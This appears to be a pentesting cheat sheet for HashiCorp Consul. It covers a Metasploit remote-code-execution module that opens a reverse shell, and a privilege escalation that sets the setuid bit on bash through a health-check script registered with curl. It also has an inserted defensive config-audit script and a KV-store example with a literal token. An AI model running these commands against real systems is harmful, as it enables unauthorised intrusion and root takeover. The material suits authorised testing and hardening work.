# HashiCorp Consul Pentesting

Consul is an open-source service networking platform developed by HashiCorp. The default port is 8500.

### Interesting Files in Target System

If we are in the target system, we can investigate the following files:

```shellscript
cat /etc/consul.d/config.json
```

### RCE

Resource: [Pentester Academy Blog](https://blog.pentesteracademy.com/hashicorp-consul-remote-command-execution-via-services-api-d709f8ac3960)

Using Metasploit, we may be able to execute commands and get a reverse shell. Run the following commands on your local machine.

```shellscript
msfconsole
msf> use exploit/multi/misc/consul_service_exec
msf> set rhosts <target-ip>
msf> set lhost <your-ip>
msf> run
# Session created...
msf> shell # Spawn the shell
whoami # Run command in the target system
```

### Privilege Escalation

If you have the ACL token (xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxxx), you may be able to escalate privileges.\
First, create a script that changes the permissions of `bash` (it sets the setuid/setgid bits).

```shellscript
echo 'chmod +s /usr/bin/bash' > /tmp/exploit.sh
```

Then use curl to register a service whose health check runs the script.

```shellscript
curl --header "X-Consul-Token: <ACL-TOKEN>" --request PUT -d '{"ID": "test", "Name": "test", "Address": "127.0.0.1", "Port": 80, "check": {"Args": ["/usr/bin/bash", "/tmp/exploit.sh"], "interval": "10s", "timeout": "1s"}}' http://127.0.0.1:8500/v1/agent/service/register
```
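Both the RCE and the privilege-escalation steps above rely on agent settings that can be audited in `/etc/consul.d/config.json`. The following is an added example, not code from the original page or from HashiCorp: the helper `audit_consul_config`, the finding IDs and both sample configs are constructed for illustration, and it assumes the config is JSON and ignores per-listener overrides.

```python
import ipaddress
import json

# Constructed weak agent config (sample values, not from a real host).
WEAK_CONFIG = json.loads("""
{
  "client_addr": "0.0.0.0",
  "enable_script_checks": true,
  "acl": {"enabled": true, "default_policy": "allow",
          "tokens": {"agent": "00000000-0000-0000-0000-000000000000"}}
}
""")

# Constructed hardened counterpart.
HARDENED_CONFIG = {
    "client_addr": "127.0.0.1",
    "enable_local_script_checks": True,  # script checks only from local config files
    "acl": {"enabled": True, "default_policy": "deny"},
}


def _is_loopback(addr):
    try:
        return ipaddress.ip_address(addr).is_loopback
    except ValueError:
        return False  # interface names, templates, sockets: flag for manual review


def audit_consul_config(cfg):
    """Return sorted finding IDs for a parsed agent config (hypothetical helper)."""
    findings = set()
    acl = cfg.get("acl") or {}
    # With this set, script checks can be registered through the HTTP API.
    if cfg.get("enable_script_checks"):
        findings.add("remote-script-checks")
    if not acl.get("enabled"):
        findings.add("acl-disabled")
    elif acl.get("default_policy", "allow") != "deny":  # Consul defaults to allow
        findings.add("acl-default-allow")
    # client_addr defaults to 127.0.0.1 and may list several space-separated addresses.
    addrs = str(cfg.get("client_addr", "127.0.0.1")).split()
    if not all(_is_loopback(a) for a in addrs):
        findings.add("api-not-loopback")
    # Tokens stored in the file are readable by anyone who can read the config.
    if acl.get("tokens"):
        findings.add("tokens-in-config-file")
    return sorted(findings)
```

To audit a real agent, pass the result of `json.load()` on its config file to `audit_consul_config`.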

### KV (Key/Value) Store

```shellscript
# Put
consul kv put --token <ACL-TOKEN> key value
consul kv put --token bb03b43b-1d81-d62b-24b5-39540ee469b5 path/to/store data
```
